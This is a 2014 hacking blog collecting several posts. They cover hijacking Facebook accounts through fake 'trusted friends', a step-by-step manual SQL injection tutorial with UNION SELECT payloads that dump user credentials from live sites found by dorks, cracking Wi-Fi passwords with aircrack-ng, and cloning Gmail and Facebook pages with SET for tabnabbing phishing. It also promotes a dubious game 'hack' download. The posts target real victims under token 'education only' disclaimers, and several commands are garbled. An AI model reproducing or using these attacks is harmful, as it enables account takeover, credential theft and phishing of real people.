
Sunday, 27 April 2014

Hack Facebook Account Using 3 Trusted Friends Method

Hack Facebook Account Using 3
Trusted Friends Method

Hey Friends "Facebook Account
Hacking" is the most popular term
in the Web,
i found a new security hole
(hacking trick) in the FB, which is
hacking facebookusing three
trusted friends method/technique.
So we can Hack Facebook easily
now with this method. Now we
can hack Facebook online with
the help of new password
recovery feature of Facebook.
Facebook recently released new
way to Recover Account Password
using "3 Trusted Friends
features". If we ever forget 0ur
FB account password then
FaceBook will send unique
security code to our three friends.
Then we have to ask that security
codes to those three friend by
mail or phone call. And after
giving that codes to FB we can
recover the Facebook password.
Note:- Those Three fake account
must be 7-8 days older, otherwise
this FB Hack will not work So lets
start on our trick on how to Hack
FB Account using those three fake

Step 1: Go to & click on
Forgot Password.

Step 2: Now give the victims FB
account's email (or) if give the
FaceBook username (or) Profile
name & click on search. And then
you'll get the victims profile
account. Just click on ("yes,This is
my Account").

Step 3: Then click on (No longer
have access to this).

Step 4: Now you'll be asked to
enter new email address, just
enter your own new email

Step 5: Now FB will ask you to
give security questions answers.
Not to worry, just enter wrong
answer thrice & you will be
redirected to the new page.

Step 6: Here is the main part of
Hacking Of FB Accounts.
Click on Continue & FaceBook
will ask you to select Three
Trusted Friends. Their will be a
full friends list of the victim which
also includes your previously
created (Three Fake Facebook
Account) .Just select that three
accounts & then Facebook will
send security codes to our fake

Now collect those security codes
& enter it. Then Facebook will
send (Password Recovery Email)
at the email address we entered
in 4th step. So now you can easily
reset the password of victims fb

Now we have successfully done with Hack Facebook Accounts.This is a big loop hole in facebook.


~~~jaii hoo~~~

Wednesday, 23 April 2014

Manual SQL injection

Manual SQL injection

Part One - Website Assessment

Step 1.Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. If you are unfamiliar with the term "dorks",

Dorks are website URLs that are possibly vulnerable. In SQL injection these dorks look like this:


This will be inputted into Google's search bar and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same

characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

After pressing enter, if this website returns an error such as the following:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5
Or something similar, this means it's vulnerable to injection.

Determining the amount of columns

If we want to use commands and get results we must know how many columns there are on a website.

To find the number of columns we write a query with incrementing values until we get an error, like this:

Code: ORDER BY 1-- <---No error ORDER BY 2-- <---No error ORDER BY 3-- <---No error ORDER BY 4-- <---No error ORDER BY 5-- <---ERROR!
This means that there are four columns!


Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while

keeping the double null (--) at the end of the string.

Code: UNION SELECT 1,2,3,4--
Don't forget to put the extra null(-) in between the "=" sign and the value (the number).


Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are

vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what

you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2

as an example). The command should look like this:

Code: UNION SELECT 1,@@version,3,4--
Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code: UNION SELECT 1,unhex(hex(@@version)),3,4--
NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Finding the database

To find the database we use a query like the one below:

Code: UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--
This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code: UNION SELECT 1,concat(database()),3,4--
You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code: UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name)

together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit

which I will explain now.

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--
What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--
Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--
This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is

turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--
Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we

want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is

where the database name comes in handy:

Code: UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--
In this query, 0x3a is the hex value of a colon (Smile which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to

Section Four.

Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!


~~~jaii hoo~~~

Monday, 21 April 2014

Teen Patti Hack by (Cyber Attacker)

Teen Patti Hack Follow This Main
Hack Instruction:

*. Download Teen Patti – Indian
Poker Hack from link below.[click
download Button]

*.When, you find links, choose iOS
or Android option Download.

*.OK, after finish download, you
must open[iOS or Android]_hack.rar

*.Now you must connect Device to

*.After connect, move files from .rar
to internal memory(iOS) or to

*.The hack must be in …/data/Teen
Patti – Indian Poker/(there).

*.now let’s start hack! Hack info

*.Works on ALL version game!

*.Works on Android phones and
tablets, and on iOS Devices
including iPhone, iPad, iPad Mini,
*.100% SAFE.

*.Easy to use! Just click and wait
few seconds.

Get Download links


(2) num ka link blog me open nahi
hoga es link ko copy karo or kisi
bhi browser k URL me paste karo



~~~jaii hoo~~~

How To Hack Wi-Fi Password Using Backtrack 3

How To Hack Wi-Fi Password Using
Backtrack 3..

Download Backtrack 3 :-

Now Create A Bootable Disk of
Backtrack 3 and Follow the Simple

1. Insert The Disc Of BackTrack

2. Start The System

3. Go To Start

4. Go To Internet

5. Go To Wireless Adapter (To
LAN Card)

6. Open KONSOLE and Use
Commands :-

1. airmon-ng (Search WiFi

2. airmon-ng stop wifi card name
(To Stop The Network)

3. ifconfig wifi card name down (To
Make Network Down)

4. macchanger umac
00:11:22:33:44:55 wifi card name
(To Change MAC Address)

5. airmon-ng start wifi card name
(To Start Network)

6. airodump-ng wifi card name (To
Get BSSID, Channel No, ESSID)

7. airodump-ng u channel no uw
name u BSSID paste BSSID wifi card
name (To Check Traffic On WiFi)
Now You Need Upto 10,000 Users
Using The WiFi Network to Hack The
WiFi Password...
* Now Open New Konsole..

8. aireplay-ng -1 0 ua paste BSSID
uh 00:11:22:33:44:55 ue ESSID wifi
card name (To Make Data Packet)

9. aireplay-ng -3 ub paste BSSID
00:11:22:33:44:55 wifi card name
(To Send Data Packet)
When The Number of Users Cross
10,000 Limit Then..
* Open New Konsole..

10. aircrack-ng un 64 ub BSSID file
name (To Get Password)

Done... Enjoy Free Internet..
Only for Education Purpose..

~~~jaii hoo~~~

Hack Gmail and Facebook Account

Hack Into Gmail And Facebook
Using Kali Linux!
I'm not trying to tell you to hack
into the websites. Kali Linux is
meant for ethical hacking.
Remember that.
Kali Linux is undoubtedly one of the
most popular and advanced
penetration testing platforms till
date. Many or even most hackers
prefer to use this platform for all
their endeavours. Ethical hacking
also is a much sought after field
and here’s something that Kali
Linux users will appreciate. The
following steps show how to clone
Gmail and Facebook using
Backtrack 5 or Kali Linux.

1. Open
the backtrack terminal use the
ifconfig command to find your IP

2. On the terminal type
cd /pentest/exploits/set

3. You will
need to have the Social Engineering
Toolkit (SET) for this one.

4. Start
this us and then choose the second
option, which says ‘Website Attack

5. In the next part, you
have to select the fourth option,
which says ‘Tabnabbing Attack

6. Choose the second
option, which is ‘Site Cloner’.

7.Now you have to enter the URL of
the website that you want to clone
or hack into. In this case the URL
will be The SET
will automatically create the clone.
Press enter in order to continue.

8.The URL now needs to be converted
into the Google URL. For this use and send the link address to
you’re the person you want to
attack. This you can do in a myriad
number of ways like email, chat etc.

9. When your victim will open their
internet browser for Gmail, they
should get a message saying that
the page is still loading. As soon as
they open a new tab, the fake clone
that we made will start functioning.

note:-its inly for education
purpose..don't use it for personal


~~~jaiii hoo~~~